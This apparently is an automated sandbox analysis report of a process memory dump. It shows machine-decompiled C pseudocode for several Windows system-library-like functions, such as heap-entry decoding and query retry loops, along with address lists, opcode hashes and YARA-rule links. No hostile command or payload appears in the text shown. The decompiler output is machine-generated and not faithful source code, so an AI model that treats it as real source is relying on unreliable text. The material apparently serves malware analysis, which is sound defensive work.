								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x1e47740d
0x1e47740d
0x1e477412
0x1e477413
0x1e477416
0x1e477418
0x1e47741c
0x1e47741f
0x1e477422
0x1e477422
0x1e477428
0x1e47742a
0x1e47742a
0x1e477451
0x1e477432
0x1e47744f
0x1e47744f
0x00000000
0x1e477434
0x1e477438
0x1e477443
0x1e477517
0x1e477517
0x1e47751a
0x1e477535
0x1e477520
0x1e477527
0x1e47752c
0x1e477531
0x1e477533
0x00000000
0x1e477533
0x00000000
0x1e477531
0x1e47754b
0x1e47754f
0x1e47755c
0x1e47755c
0x1e47755f
0x1e477560
0x1e477561
0x1e477562
0x1e477563
0x1e477568
0x1e47756a
0x1e47756c
0x1e47756d
0x1e47756d
0x1e47756f
0x1e477572
0x1e477574
0x1e477577
0x1e47757c
0x1e47757f
0x00000000
0x1e477551
0x1e477551
0x1e477551
0x1e477553
0x1e477553
0x1e477449
0x1e477449
0x1e47744c
0x1e47744c
0x00000000
0x1e47744c
0x1e477443
0x1e47750e
0x1e477514
0x1e477514
0x1e477455
0x1e477469
0x1e47746d
0x00000000
0x1e477473
0x1e477473
0x1e477476
0x1e477480
0x1e477484
0x1e47748e
0x1e477493
0x1e477493
0x1e477496
0x1e477499
0x1e4774a1
0x1e4774b1
0x1e4774b5
0x00000000
0x1e4774bb
0x1e4774c1
0x1e4774c1
0x1e4774c4
0x1e4774c5
0x1e4774c6
0x1e4774c7
0x1e4774c8
0x1e4774cd
0x00000000
0x1e4774d3
0x1e4774d3
0x1e4774d6
0x1e4774d8
0x1e4774db
0x1e4774dd
0x1e4774e0
0x1e4774e7
0x1e4774ee
0x1e4774ee
0x1e4774f4
0x1e4774f9
0x00000000
0x1e4774fb
0x1e4774fb
0x1e4774fd
0x1e477500
0x1e477503
0x1e477505
0x1e477505
0x1e4774f9
0x00000000
0x1e4774cd
0x1e4774b5
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: b92a67d7b161b88ddc19b267c98fd9d18f71d35abb5a55a8f1d5c986e127d0f2
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 58519B71A00646EFCB15CF14C484A86BBB6FF45305F55C6AAE908DF216E371E986CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D2990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1E3D2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x1e47ff00);
				E1E3FD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1e381664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E1E3EE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1e381668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E1E4251BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x1e38166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E1E3D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E1E3B6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E1E3D2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E1E3BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E1E3D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E1E3D2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E1E3D2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E1E3FD0D1(_t62);
				goto L28;
			}

0x1e3d2990
0x1e3d2992
0x1e3d2997
0x1e3d29a3
0x1e3d29a6
0x1e3d29ab
0x1e3d29ad
0x1e3d29b2
0x1e415c80
0x1e3d29b8
0x1e3d29b8
0x1e3d29bb
0x1e3d29c0
0x1e3d29c5
0x1e3d29c6
0x1e3d29c6
0x1e3d29cb
0x00000000
0x00000000
0x1e3d29cd
0x1e3d29d0
0x1e3d29d9
0x1e3d29db
0x1e3d29dd
0x1e3d2a7f
0x1e3d2a84
0x1e3d2a87
0x1e3d2a89
0x1e415ca1
0x1e415ca3
0x00000000
0x1e3d2a8f
0x1e3d2a8f
0x00000000
0x1e3d2a8f
0x00000000
0x1e3d29e3
0x1e3d29e3
0x1e3d29e3
0x00000000
0x1e3d29e3
0x1e3d29dd
0x00000000
0x1e3d29db
0x1e3d29e6
0x1e3d29e9
0x1e3d29eb
0x1e3d29ed
0x1e3d29f3
0x1e3d29f5
0x1e3d29f8
0x1e3d29fa
0x1e3d2a97
0x1e3d2a9a
0x1e3d2a9d
0x1e3d2add
0x00000000
0x1e3d2a9f
0x1e3d2aa2
0x1e3d2aa5
0x1e3d2aa8
0x1e3d2aab
0x1e415cab
0x1e415caf
0x1e415cc5
0x1e415cda
0x1e415cdc
0x1e415cdf
0x1e415ce5
0x00000000
0x1e415ceb
0x1e415ced
0x1e415cee
0x00000000
0x1e415cee
0x1e415cb1
0x1e415cb4
0x1e415cb9
0x1e415cbb
0x00000000
0x1e415cbd
0x1e415cbd
0x00000000
0x1e415cbd
0x1e415cbb
0x1e3d2ab1
0x1e3d2ab1
0x1e3d2ac4
0x1e3d2ac6
0x1e3d2ac6
0x00000000
0x1e3d2ac6
0x1e3d2aab
0x00000000
0x1e3d2a00
0x1e3d2a09
0x1e3d2a0e
0x1e3d2a21
0x1e3d2a24
0x1e3d2a35
0x1e3d2a3a
0x1e3d2a3d
0x1e3d2a42
0x1e3d2a59
0x1e3d2a59
0x1e3d2a5c
0x1e3d2a5f
0x1e3d2a5f
0x1e3d29fa
0x1e3d29f3
0x1e3d2a64
0x1e3d2a64
0x1e3d2a6b
0x1e3d2a6b
0x1e3d2a6d
0x1e3d2a72
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a497861f7cd48788c14a3a2b740ad9a878bd8c842326005d3ab1123c59efc4
Instruction ID: e64fc332ca444d4c6f850d45a7f6b27c75e1a7e59c5a5eacae9815760abe1971
Opcode Fuzzy Hash: c3a497861f7cd48788c14a3a2b740ad9a878bd8c842326005d3ab1123c59efc4
Instruction Fuzzy Hash: 2A516A7690024ADFCF15CF55C880ADEBBB6FF48720F518655F810AB250DB35A996CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D4BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1E3D4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x1e49d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E1E3ACC50(_t86);
					L11:
					return E1E3EB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1e498504
				E1E3C2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E1E3EFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E1E3EB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L1E3C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E1E3ACCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1e498504
								E1E3BFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E1E3D4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x1e3d4bad
0x1e3d4bbf
0x1e3d4bc2
0x1e3d4bc6
0x1e3d4bcd
0x1e3d4bd9
0x1e4167fe
0x1e416800
0x1e3d4ccc
0x1e3d4ccd
0x1e3d4cb7
0x1e3d4cc9
0x1e3d4cc9
0x1e3d4bdf
0x1e3d4be5
0x00000000
0x00000000
0x1e3d4beb
0x1e3d4bef
0x00000000
0x00000000
0x1e3d4bf5
0x1e3d4bf9
0x1e3d4c06
0x1e3d4c0b
0x1e3d4c17
0x1e3d4c1c
0x1e3d4c1f
0x1e3d4c25
0x1e3d4c33
0x1e3d4c3d
0x1e3d4c40
0x1e3d4c43
0x1e3d4c47
0x1e3d4c4d
0x1e3d4c53
0x1e3d4c54
0x1e3d4c55
0x1e3d4c56
0x1e3d4c5b
0x1e3d4c5c
0x1e3d4c63
0x1e3d4c6b
0x00000000
0x00000000
0x1e416776
0x1e416784
0x1e416784
0x1e41679f
0x1e4167a7
0x1e4167af
0x1e4167ce
0x00000000
0x1e4167b1
0x1e4167b7
0x1e4167b8
0x1e4167c1
0x1e4167d3
0x1e4167d9
0x1e4167dd
0x1e3d4c94
0x1e3d4c94
0x1e3d4c98
0x1e3d4c9c
0x1e3d4ca3
0x1e4167f4
0x1e4167f4
0x1e3d4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x1e3d4cb5
0x1e3d4c79
0x1e3d4c7e
0x1e3d4c89
0x1e3d4c8b
0x1e3d4c8f
0x1e3d4c8f
0x00000000
0x1e3d4c89
0x1e4167c3
0x00000000
0x1e4167c3
0x1e4167af
0x1e3d4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d4d426ac03d74f906d346d0f42825edb2d267b4a029fcb7a8fbb5eb758a6bac
Instruction ID: b05bfb43a0493d2e6d446ecd2615952bed2e0e38affbafcf38078648aa770438
Opcode Fuzzy Hash: 1d4d426ac03d74f906d346d0f42825edb2d267b4a029fcb7a8fbb5eb758a6bac
Instruction Fuzzy Hash: 8641A436A40369ABCB21DF64C940BDA77B9FF45700F4106A6E909AB340DB74EE84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E1E3D4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x1e49d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E1E3EFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1e497bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E1E3EB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L1E3C4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E1E3ACCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E1E3EB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E1E3EF380(_t67 + 0xc, 0x1e385138, 0x10) == 0) {
								 *0x1e4960d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E1E3D4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E1E3D4E70(0x1e4986b0, 0x1e3d5690, 0, 0) != 0) {
					_t46 = E1E3ACCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x1e3d4d3b
0x1e3d4d4d
0x1e3d4d53
0x1e3d4d58
0x1e3d4d65
0x1e3d4d6c
0x1e3d4d71
0x1e3d4d77
0x1e3d4d7f
0x1e3d4d8c
0x1e3d4d8e
0x1e3d4dad
0x1e3d4db0
0x1e3d4db7
0x1e3d4db8
0x1e3d4db9
0x1e3d4dba
0x1e3d4dbb
0x1e3d4dc1
0x1e3d4dc8
0x1e3d4dcc
0x1e3d4dd5
0x1e3d4dde
0x1e3d4ddf
0x1e3d4de0
0x1e3d4de1
0x1e3d4de6
0x1e3d4de7
0x1e3d4de9
0x1e3d4df3
0x00000000
0x00000000
0x1e416c7c
0x1e416c8a
0x1e416c8a
0x1e416c9d
0x1e416ca7
0x1e416cac
0x1e416cb2
0x1e416cb9
0x00000000
0x1e416cbf
0x1e416cbf
0x00000000
0x1e416cbf
0x1e416cb9
0x1e3d4dfb
0x1e416ccf
0x1e416cd3
0x1e3d4e32
0x1e3d4e39
0x1e416ce0
0x1e416cf2
0x1e416cf2
0x1e416ce0
0x1e3d4e3f
0x1e3d4e41
0x1e3d4e51
0x1e3d4e51
0x1e3d4e03
0x1e3d4e03
0x1e3d4e09
0x1e3d4e0f
0x1e3d4e57
0x00000000
0x00000000
0x1e3d4e1b
0x1e3d4e30
0x1e3d4e5b
0x1e3d4e5b
0x00000000
0x1e3d4e30
0x1e3d4e11
0x1e3d4e11
0x1e3d4e16
0x00000000
0x1e3d4e16
0x1e3d4e01
0x00000000
0x1e3d4e01
0x1e3d4da5
0x1e416c6b
0x00000000
0x1e3d4dab
0x1e3d4dab
0x00000000
0x1e3d4dab

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2991a46febee6c089a2356b0f4ec1e8ff55d167760ac0ce15f47ab6c0a906737
Instruction ID: b019272d72e5882b4fa8b018810c92e8c4fac452894a65b43d38bc57eda430cd
Opcode Fuzzy Hash: 2991a46febee6c089a2356b0f4ec1e8ff55d167760ac0ce15f47ab6c0a906737
Instruction Fuzzy Hash: 3741C776A40358AFEB21CF14CC80F96B7AEFB84610F40079AE9459B381D774ED48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E472B28, Relevance: .1, Instructions: 129
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1E472B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x1e496110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E1E3C2280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x1e496110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E1E47241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E1E3BFFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E1E473209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E1E46A80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E1E3BFFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E1E46A80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x1e496110; // 0x22cee795
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}

0x1e472b28
0x1e472b30
0x1e472b35
0x1e472b37
0x1e472b3a
0x1e472b3d
0x1e472b44
0x1e472b4d
0x1e472b4d
0x1e472b50
0x1e472b54
0x1e472bb0
0x1e472bbd
0x1e472be8
0x1e472bef
0x1e472bf4
0x1e472bf7
0x1e472bfa
0x1e472bfd
0x1e472c02
0x1e472c02
0x1e472c0f
0x1e472c13
0x1e472c3b
0x1e472c4a
0x1e472c4f
0x1e472c52
0x1e472c52
0x1e472c59
0x1e472c62
0x1e472c62
0x1e472c69
0x1e472c15
0x1e472c18
0x1e472c19
0x1e472c21
0x1e472c29
0x1e472c2f
0x1e472c2f
0x1e472c29
0x1e472bbf
0x1e472bc2
0x1e472bc3
0x1e472bc9
0x1e472bc9
0x1e472c72
0x1e472c72
0x1e472b56
0x1e472b5c
0x1e472b62
0x1e472b64
0x1e472b72
0x1e472b77
0x1e472ba3
0x1e472ba3
0x1e472ba5
0x1e472baa
0x00000000
0x1e472baa
0x1e472b7e
0x1e472b84
0x1e472b86
0x1e472b97
0x1e472b9c
0x1e472b9e
0x1e472b9e
0x00000000
0x1e472b9e
0x1e472b8b
0x1e472b90
0x00000000
0x00000000
0x1e472b95
0x00000000
0x1e472b95
0x1e472b6b
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7426f7c0ba6ebd951e42982b29c3598c81441f31d984211bd1d2d57c86c341d3
Instruction ID: 44a23216b840eba1021ab447d87e9db57f719fc0c02e50cc14421d5633b9e6e7
Opcode Fuzzy Hash: 7426f7c0ba6ebd951e42982b29c3598c81441f31d984211bd1d2d57c86c341d3
Instruction Fuzzy Hash: CE410BB3E105156FC314CF29C8819EAB7A9EF48A10B018B6EE855D7381D774EE06CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 1E3B8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1E3B8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x1e49d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E1E3EB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E1E3BE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1e381180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E1E3D1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E1E3E3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E1E3B8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L1E3C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x1e3b8a0a
0x1e3b8a1c
0x1e3b8a23
0x1e3b8a2e
0x1e3b8a30
0x1e3b8a36
0x1e3b8a3c
0x1e3b8a3e
